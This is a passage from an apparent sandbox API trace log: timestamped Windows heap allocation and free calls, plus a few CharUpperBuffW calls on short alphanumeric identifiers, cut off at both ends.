(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0219.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0219.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0219.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0219.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0219.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0219.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0219.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.263] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0219.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0219.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0219.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0219.264] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0219.264] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0219.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7e8 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ff8 [0219.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0219.265] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0219.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0219.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ff8 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0219.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0219.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.267] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab890 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0219.267] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0219.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0219.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0219.269] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.269] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0219.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0219.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: 